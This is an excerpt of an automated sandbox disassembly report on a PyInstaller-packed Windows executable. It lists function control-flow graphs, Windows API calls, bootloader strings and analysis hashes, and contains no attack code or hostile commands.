                                                            control_flow_graph 792 7ff6dd6765ec-7ff6dd676621 call 7ff6dd675cf8 call 7ff6dd675d00 call 7ff6dd675d68 799 7ff6dd676627-7ff6dd676632 call 7ff6dd675d08 792->799 800 7ff6dd67675f-7ff6dd6767cd call 7ff6dd66aec4 call 7ff6dd671be8 792->800 799->800 805 7ff6dd676638-7ff6dd676643 call 7ff6dd675d38 799->805 812 7ff6dd6767db-7ff6dd6767de 800->812 813 7ff6dd6767cf-7ff6dd6767d6 800->813 805->800 811 7ff6dd676649-7ff6dd67666c call 7ff6dd66af0c GetTimeZoneInformation 805->811 824 7ff6dd676734-7ff6dd67675e call 7ff6dd675cf0 call 7ff6dd675ce0 call 7ff6dd675ce8 811->824 825 7ff6dd676672-7ff6dd676693 811->825 815 7ff6dd676815-7ff6dd676828 call 7ff6dd66dbbc 812->815 816 7ff6dd6767e0 812->816 817 7ff6dd67686b-7ff6dd67686e 813->817 829 7ff6dd67682a 815->829 830 7ff6dd676833-7ff6dd67684e call 7ff6dd671be8 815->830 819 7ff6dd6767e3 816->819 818 7ff6dd676874-7ff6dd67687c call 7ff6dd676370 817->818 817->819 826 7ff6dd6767e8-7ff6dd676814 call 7ff6dd66af0c call 7ff6dd65bcc0 818->826 819->826 827 7ff6dd6767e3 call 7ff6dd6765ec 819->827 831 7ff6dd676695-7ff6dd67669b 825->831 832 7ff6dd67669e-7ff6dd6766a5 825->832 827->826 835 7ff6dd67682c-7ff6dd676831 call 7ff6dd66af0c 829->835 850 7ff6dd676855-7ff6dd676867 call 7ff6dd66af0c 830->850 851 7ff6dd676850-7ff6dd676853 830->851 831->832 837 7ff6dd6766b9 832->837 838 7ff6dd6766a7-7ff6dd6766af 832->838 835->816 842 7ff6dd6766bb-7ff6dd67672f call 7ff6dd65d0e0 * 4 call 7ff6dd6731cc call 7ff6dd676884 * 2 837->842 838->837 845 7ff6dd6766b1-7ff6dd6766b7 838->845 842->824 845->842 850->817 851->835
                                                            APIs
                                                            • _get_daylight.LIBCMT ref: 00007FF6DD67661A
                                                              • Part of subcall function 00007FF6DD675D68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DD675D7C
                                                            • _get_daylight.LIBCMT ref: 00007FF6DD67662B
                                                              • Part of subcall function 00007FF6DD675D08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DD675D1C
                                                            • _get_daylight.LIBCMT ref: 00007FF6DD67663C
                                                              • Part of subcall function 00007FF6DD675D38: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DD675D4C
                                                              • Part of subcall function 00007FF6DD66AF0C: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6DD673392,?,?,?,00007FF6DD6733CF,?,?,00000000,00007FF6DD673895,?,?,00000000,00007FF6DD6737C7), ref: 00007FF6DD66AF22
                                                              • Part of subcall function 00007FF6DD66AF0C: GetLastError.KERNEL32(?,?,?,00007FF6DD673392,?,?,?,00007FF6DD6733CF,?,?,00000000,00007FF6DD673895,?,?,00000000,00007FF6DD6737C7), ref: 00007FF6DD66AF2C
                                                            • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DD67687C), ref: 00007FF6DD676663
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: _get_daylight_invalid_parameter_noinfo$ErrorInformationLanguagesLastPreferredRestoreThreadTimeZone
                                                            • String ID: Eastern Standard Time$Eastern Summer Time
                                                            • API String ID: 2248164782-239921721
                                                            • Opcode ID: d89d275585cbbb59bda8e874ee0f2677ffedd79ad2d8aa11b56fbb7743459a01
                                                            • Instruction ID: 8b23f17aebb9f6c9a77f35b1d4a14621503bccc3003ec44662c934d1ef93dc3d
                                                            • Opcode Fuzzy Hash: d89d275585cbbb59bda8e874ee0f2677ffedd79ad2d8aa11b56fbb7743459a01
                                                            • Instruction Fuzzy Hash: 10516D32E186C6A6E750FF61D8915AD6760BB48784F404137EA4DC3A96FF3CE4A197C0
                                                            Function 00007FF6DD6588D0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: 61dd1ed1e1c953fe7bf24916078f2f4a3db137be7e9bcdd6edf362509e7e8552
                                                            • Instruction ID: d1e07fefa415baaa980f2a5a9d1cf82072ea05c13c8ca7916f2c423c2a707160
                                                            • Opcode Fuzzy Hash: 61dd1ed1e1c953fe7bf24916078f2f4a3db137be7e9bcdd6edf362509e7e8552
                                                            • Instruction Fuzzy Hash: EDF08122E186C586E760AF68A44876E7390AB44728F400336D66D42AD4EF3CE468AA40
                                                            Function 00007FF6DD651710 Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 148COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 7ff6dd651710-7ff6dd651724 1 7ff6dd651726-7ff6dd65173d call 7ff6dd652b30 0->1 2 7ff6dd65173e-7ff6dd651742 0->2 4 7ff6dd651768-7ff6dd65178b call 7ff6dd657c10 2->4 5 7ff6dd651744-7ff6dd65174d call 7ff6dd6512b0 2->5 13 7ff6dd65178d-7ff6dd6517b8 call 7ff6dd652890 4->13 14 7ff6dd6517b9-7ff6dd6517d4 call 7ff6dd653fd0 4->14 11 7ff6dd65175f-7ff6dd651767 5->11 12 7ff6dd65174f-7ff6dd65175a call 7ff6dd652b30 5->12 12->11 20 7ff6dd6517d6-7ff6dd6517e9 call 7ff6dd652b30 14->20 21 7ff6dd6517ee-7ff6dd651801 call 7ff6dd660814 14->21 26 7ff6dd65192f-7ff6dd651932 call 7ff6dd66018c 20->26 27 7ff6dd651823-7ff6dd651827 21->27 28 7ff6dd651803-7ff6dd65181e call 7ff6dd652890 21->28 35 7ff6dd651937-7ff6dd65194e 26->35 31 7ff6dd651829-7ff6dd651835 call 7ff6dd651050 27->31 32 7ff6dd651841-7ff6dd651861 call 7ff6dd664f90 27->32 38 7ff6dd651927-7ff6dd65192a call 7ff6dd66018c 28->38 39 7ff6dd65183a-7ff6dd65183c 31->39 40 7ff6dd651882-7ff6dd651888 32->40 41 7ff6dd651863-7ff6dd65187d call 7ff6dd652890 32->41 38->26 39->38 44 7ff6dd651915-7ff6dd651918 call 7ff6dd664f7c 40->44 45 7ff6dd65188e-7ff6dd651897 40->45 49 7ff6dd65191d-7ff6dd651922 41->49 44->49 48 7ff6dd6518a0-7ff6dd6518c2 call 7ff6dd6604dc 45->48 52 7ff6dd6518c4-7ff6dd6518dc call 7ff6dd660c1c 48->52 53 7ff6dd6518f5-7ff6dd6518fc 48->53 49->38 59 7ff6dd6518e5-7ff6dd6518f3 52->59 60 7ff6dd6518de-7ff6dd6518e1 52->60 54 7ff6dd651903-7ff6dd65190b call 7ff6dd652890 53->54 61 7ff6dd651910 54->61 59->54 60->48 62 7ff6dd6518e3 60->62 61->44 62->61
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
                                                            • API String ID: 2030045667-3833288071
                                                            • Opcode ID: 5f584f7088dbf44249761d4b7ccbccdbdd759d0cd5fd8e5eebf030efb760b50d
                                                            • Instruction ID: 8e269fc00dd64e4dd86e27cbfe2449a8ff3bcf7233dc736a125246b3336c46fc
                                                            • Opcode Fuzzy Hash: 5f584f7088dbf44249761d4b7ccbccdbdd759d0cd5fd8e5eebf030efb760b50d
                                                            • Instruction Fuzzy Hash: 2A51B121F086C7A6EA10BB15E8506BD6390BF55794F440533DE1C87A96FF3CF5A4A780
                                                            Function 00007FF6DD658950 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 91COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(0000000100000001,00007FF6DD65414C,00007FF6DD657911,?,00007FF6DD657D26,?,00007FF6DD651785), ref: 00007FF6DD658990
                                                            • OpenProcessToken.ADVAPI32(?,00007FF6DD657D26,?,00007FF6DD651785), ref: 00007FF6DD6589A1
                                                            • GetTokenInformation.KERNELBASE(?,00007FF6DD657D26,?,00007FF6DD651785), ref: 00007FF6DD6589C3
                                                            • GetLastError.KERNEL32(?,00007FF6DD657D26,?,00007FF6DD651785), ref: 00007FF6DD6589CD
                                                            • GetTokenInformation.KERNELBASE(?,00007FF6DD657D26,?,00007FF6DD651785), ref: 00007FF6DD658A0A
                                                            • ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6DD658A1C
                                                            • FindCloseChangeNotification.KERNELBASE(?,00007FF6DD657D26,?,00007FF6DD651785), ref: 00007FF6DD658A34
                                                            • LocalFree.KERNEL32(?,00007FF6DD657D26,?,00007FF6DD651785), ref: 00007FF6DD658A66
                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF6DD658A8D
                                                            • CreateDirectoryW.KERNELBASE(?,00007FF6DD657D26,?,00007FF6DD651785), ref: 00007FF6DD658A9E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Token$ConvertDescriptorInformationProcessSecurityString$ChangeCloseCreateCurrentDirectoryErrorFindFreeLastLocalNotificationOpen
                                                            • String ID: D:(A;;FA;;;%s)$S-1-3-4
                                                            • API String ID: 2187719417-2855260032
                                                            • Opcode ID: ab9c5a43b78f2aabbf64520a1e8ab8c22bfb93026fd8015a1f934939a7f50004
                                                            • Instruction ID: f0feab586268a28e3ba3c6276d6034746e5559fb7ce5883efffeb6472d774da0
                                                            • Opcode Fuzzy Hash: ab9c5a43b78f2aabbf64520a1e8ab8c22bfb93026fd8015a1f934939a7f50004
                                                            • Instruction Fuzzy Hash: E8417131E1C6C692EB10AF65E4446BE6360FB84794F440232EA5E87AD5EF3CE454DB80
                                                            Function 00007FF6DD651AA0 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 135COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: _fread_nolock$Message
                                                            • String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                            • API String ID: 677216364-1384898525
                                                            • Opcode ID: 846b52575a3e29ec6c17e049124d6bfaa2b8a30358e366607dda68b9dcda7143
                                                            • Instruction ID: 2985739155b202200652e000f0da436aea75acef54a1b546081858949bf73804
                                                            • Opcode Fuzzy Hash: 846b52575a3e29ec6c17e049124d6bfaa2b8a30358e366607dda68b9dcda7143
                                                            • Instruction Fuzzy Hash: 86514B71E0968696EB14EF28D44017C73A0EF48B84F554537D90CC7B9AEE7CE8A09B84
                                                            Function 00007FF6DD658080 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 90processsynchronizationCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                            • String ID: CreateProcessW$Error creating child process!
                                                            • API String ID: 2895956056-3524285272
                                                            • Opcode ID: 43f1d35e7fbf24803adac071d2ce953c020152e2d40e2e5a1956faa0815d12d1
                                                            • Instruction ID: aecd9a2e276e0a2b4ed0d62ed717683373bfda5e951628ec8423bea0587bf770
                                                            • Opcode Fuzzy Hash: 43f1d35e7fbf24803adac071d2ce953c020152e2d40e2e5a1956faa0815d12d1
                                                            • Instruction Fuzzy Hash: BA414331E087C692DA20EB64E4552AEB364FF94364F500336E6AD83BD5EF7CD4549B80
                                                            Function 00007FF6DD651000 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 264COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 381 7ff6dd651000-7ff6dd6539d6 call 7ff6dd65ff60 call 7ff6dd65ff58 call 7ff6dd6586b0 call 7ff6dd65ff58 call 7ff6dd65bc60 call 7ff6dd6652f0 call 7ff6dd665ef8 call 7ff6dd651eb0 399 7ff6dd6539dc-7ff6dd6539ec call 7ff6dd653ec0 381->399 400 7ff6dd653ad2 381->400 399->400 406 7ff6dd6539f2-7ff6dd653a05 call 7ff6dd653d90 399->406 401 7ff6dd653ad7-7ff6dd653af7 call 7ff6dd65bcc0 400->401 406->400 409 7ff6dd653a0b-7ff6dd653a32 call 7ff6dd657b60 406->409 412 7ff6dd653a74-7ff6dd653a9c call 7ff6dd658040 call 7ff6dd651cb0 409->412 413 7ff6dd653a34-7ff6dd653a43 call 7ff6dd657b60 409->413 424 7ff6dd653aa2-7ff6dd653ab8 call 7ff6dd651cb0 412->424 425 7ff6dd653b71-7ff6dd653b82 412->425 413->412 418 7ff6dd653a45-7ff6dd653a4b 413->418 420 7ff6dd653a4d-7ff6dd653a55 418->420 421 7ff6dd653a57-7ff6dd653a71 call 7ff6dd664f7c call 7ff6dd658040 418->421 420->421 421->412 440 7ff6dd653aba-7ff6dd653acd call 7ff6dd652b30 424->440 441 7ff6dd653af8-7ff6dd653afb 424->441 427 7ff6dd653b84-7ff6dd653b8b 425->427 428 7ff6dd653b9e-7ff6dd653ba1 425->428 427->428 431 7ff6dd653b8d-7ff6dd653b90 call 7ff6dd6514f0 427->431 432 7ff6dd653bb7-7ff6dd653bcf call 7ff6dd658ae0 428->432 433 7ff6dd653ba3-7ff6dd653ba9 428->433 445 7ff6dd653b95-7ff6dd653b98 431->445 449 7ff6dd653be2-7ff6dd653be9 SetDllDirectoryW 432->449 450 7ff6dd653bd1-7ff6dd653bdd call 7ff6dd652b30 432->450 437 7ff6dd653bab-7ff6dd653bb5 433->437 438 7ff6dd653bef-7ff6dd653bfc call 7ff6dd656de0 433->438 437->432 437->438 451 7ff6dd653c47-7ff6dd653c4c call 7ff6dd656d60 438->451 452 7ff6dd653bfe-7ff6dd653c0b call 7ff6dd656a90 438->452 440->400 441->425 444 7ff6dd653afd-7ff6dd653b14 call 7ff6dd653fd0 441->444 458 7ff6dd653b1b-7ff6dd653b47 call 7ff6dd6582b0 444->458 459 7ff6dd653b16-7ff6dd653b19 444->459 445->400 445->428 449->438 450->400 460 7ff6dd653c51-7ff6dd653c54 451->460 452->451 467 7ff6dd653c0d-7ff6dd653c1c call 7ff6dd6565f0 452->467 458->425 473 7ff6dd653b49-7ff6dd653b51 call 7ff6dd66018c 458->473 462 7ff6dd653b56-7ff6dd653b6c call 7ff6dd652b30 459->462 465 7ff6dd653c5a-7ff6dd653c67 460->465 466 7ff6dd653d06-7ff6dd653d15 call 7ff6dd6534c0 460->466 462->400 470 7ff6dd653c70-7ff6dd653c7a 465->470 466->400 483 7ff6dd653d1b-7ff6dd653d6f call 7ff6dd657fd0 call 7ff6dd657b60 call 7ff6dd653620 call 7ff6dd658080 call 7ff6dd656840 call 7ff6dd656d60 466->483 481 7ff6dd653c3d-7ff6dd653c42 call 7ff6dd656840 467->481 482 7ff6dd653c1e-7ff6dd653c2a call 7ff6dd656570 467->482 474 7ff6dd653c7c-7ff6dd653c81 470->474 475 7ff6dd653c83-7ff6dd653c85 470->475 473->462 474->470 474->475 479 7ff6dd653c87-7ff6dd653caa call 7ff6dd651ef0 475->479 480 7ff6dd653cd1-7ff6dd653d01 call 7ff6dd653620 call 7ff6dd653460 call 7ff6dd653610 call 7ff6dd656840 call 7ff6dd656d60 475->480 479->400 496 7ff6dd653cb0-7ff6dd653cba 479->496 480->401 481->451 482->481 497 7ff6dd653c2c-7ff6dd653c3b call 7ff6dd656c30 482->497 517 7ff6dd653d7d-7ff6dd653d80 call 7ff6dd651e80 483->517 518 7ff6dd653d71-7ff6dd653d78 call 7ff6dd657d40 483->518 500 7ff6dd653cc0-7ff6dd653ccf 496->500 497->460 500->480 500->500 521 7ff6dd653d85-7ff6dd653d87 517->521 518->517 521->401
                                                            APIs
                                                              • Part of subcall function 00007FF6DD653EC0: GetModuleFileNameW.KERNEL32(?,00007FF6DD6539EA), ref: 00007FF6DD653EF1
                                                            • SetDllDirectoryW.KERNEL32 ref: 00007FF6DD653BE9
                                                              • Part of subcall function 00007FF6DD657B60: GetEnvironmentVariableW.KERNEL32(00007FF6DD653A1F), ref: 00007FF6DD657B9A
                                                              • Part of subcall function 00007FF6DD657B60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6DD657BB7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                            • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                            • API String ID: 2344891160-3602715111
                                                            • Opcode ID: 75d5e878bc4890178a3da353d5770ee612a7f9e78672ba99b8074ad5dbb5bed5
                                                            • Instruction ID: a75881c4a59c53286c66e0c60779290c9e55755896e805b6d447150e5f928f50
                                                            • Opcode Fuzzy Hash: 75d5e878bc4890178a3da353d5770ee612a7f9e78672ba99b8074ad5dbb5bed5
                                                            • Instruction Fuzzy Hash: C4B18C21E1C6C651EE25BB21D4512BD6290BF94F84F400533EA4DC7A9BFF2CE9A5E780
                                                            Function 00007FF6DD651050 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 156COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 522 7ff6dd651050-7ff6dd6510ab call 7ff6dd65b4e0 525 7ff6dd6510ad-7ff6dd6510d2 call 7ff6dd652b30 522->525 526 7ff6dd6510d3-7ff6dd6510eb call 7ff6dd664f90 522->526 531 7ff6dd6510ed-7ff6dd651104 call 7ff6dd652890 526->531 532 7ff6dd651109-7ff6dd651119 call 7ff6dd664f90 526->532 537 7ff6dd65126c-7ff6dd651281 call 7ff6dd65b1c0 call 7ff6dd664f7c * 2 531->537 538 7ff6dd65111b-7ff6dd651132 call 7ff6dd652890 532->538 539 7ff6dd651137-7ff6dd651147 532->539 554 7ff6dd651286-7ff6dd6512a0 537->554 538->537 541 7ff6dd651150-7ff6dd651175 call 7ff6dd6604dc 539->541 548 7ff6dd65117b-7ff6dd651185 call 7ff6dd660250 541->548 549 7ff6dd65125e 541->549 548->549 556 7ff6dd65118b-7ff6dd651197 548->556 552 7ff6dd651264 549->552 552->537 557 7ff6dd6511a0-7ff6dd6511c8 call 7ff6dd659990 556->557 560 7ff6dd6511ca-7ff6dd6511cd 557->560 561 7ff6dd651241-7ff6dd65125c call 7ff6dd652b30 557->561 562 7ff6dd65123c 560->562 563 7ff6dd6511cf-7ff6dd6511d9 560->563 561->552 562->561 565 7ff6dd6511db-7ff6dd6511e8 call 7ff6dd660c1c 563->565 566 7ff6dd651203-7ff6dd651206 563->566 572 7ff6dd6511ed-7ff6dd6511f0 565->572 569 7ff6dd651208-7ff6dd651216 call 7ff6dd65ca40 566->569 570 7ff6dd651219-7ff6dd65121e 566->570 569->570 570->557 571 7ff6dd651220-7ff6dd651223 570->571 574 7ff6dd651237-7ff6dd65123a 571->574 575 7ff6dd651225-7ff6dd651228 571->575 576 7ff6dd6511f2-7ff6dd6511fc call 7ff6dd660250 572->576 577 7ff6dd6511fe-7ff6dd651201 572->577 574->552 575->561 579 7ff6dd65122a-7ff6dd651232 575->579 576->570 576->577 577->561 579->541
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID: 1.2.13$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                            • API String ID: 2030045667-1655038675
                                                            • Opcode ID: 912b3f155217b08bd989d1562fee40c331c6fc125c04819d7b59a7e191544c21
                                                            • Instruction ID: aa9fc5bbed4fd54f18c7bd24757b2cb2855c80b3daa67aedb109c5b3fc1a004d
                                                            • Opcode Fuzzy Hash: 912b3f155217b08bd989d1562fee40c331c6fc125c04819d7b59a7e191544c21
                                                            • Instruction Fuzzy Hash: 47519C22E096C285EA60FB55A4403BE7290FB85794F444136EE4DC778AFE3CE5A5A780
                                                            Function 00007FF6DD66F1D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF6DD66F56A,?,?,-00000018,00007FF6DD66B317,?,?,?,00007FF6DD66B20E,?,?,?,00007FF6DD666452), ref: 00007FF6DD66F34C
                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF6DD66F56A,?,?,-00000018,00007FF6DD66B317,?,?,?,00007FF6DD66B20E,?,?,?,00007FF6DD666452), ref: 00007FF6DD66F358
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeLibraryProc
                                                            • String ID: api-ms-$ext-ms-
                                                            • API String ID: 3013587201-537541572
                                                            • Opcode ID: d2429d82f74935346a71535361e23a0a0fd68cfa18870ede5d154c99e1daa8a5
                                                            • Instruction ID: cdb013f7f82069f14b70162649c538c201c39c20df7fd9db00b4cfa70b723199
                                                            • Opcode Fuzzy Hash: d2429d82f74935346a71535361e23a0a0fd68cfa18870ede5d154c99e1daa8a5
                                                            • Instruction Fuzzy Hash: 52413362F19A8251FA15EFA6980017D2395BF45BA0F480537DD0DD7784FE3CE869A7C0
                                                            Function 00007FF6DD66C01C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
